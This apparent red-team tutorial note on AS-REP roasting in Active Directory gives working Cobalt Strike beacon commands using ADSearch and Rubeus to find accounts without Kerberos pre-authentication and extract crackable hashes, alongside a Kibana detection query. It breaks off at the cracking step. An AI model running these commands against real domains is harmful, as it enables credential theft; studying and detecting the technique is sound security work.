AS-REP roasting is an attack on Kerberos that involves cracking the user’s password from AS-REP. Directly requesting an AS-REP requires pre-authentication to be disabled. AS-REP can be roasted like TGS-REP to obtain the plaintext password of the user.
OPSEC warning
AS-REP roasting generates a 4768 event (with ticket encryption type: RC4 and preauth type: 0).
Kibana:
event.code: 4768 and winlog.event_data.PreAuthType: 0 and winlog.event_data.TicketEncryptionType: 0x17
To find accounts vulnerable to AS-REP roasting (i.e. preauthentication disabled) using ADSearch:
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountnameTo obtain an AS-REP in hash format using Rubeus:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:[username] /nowrapTo crack the hash offline: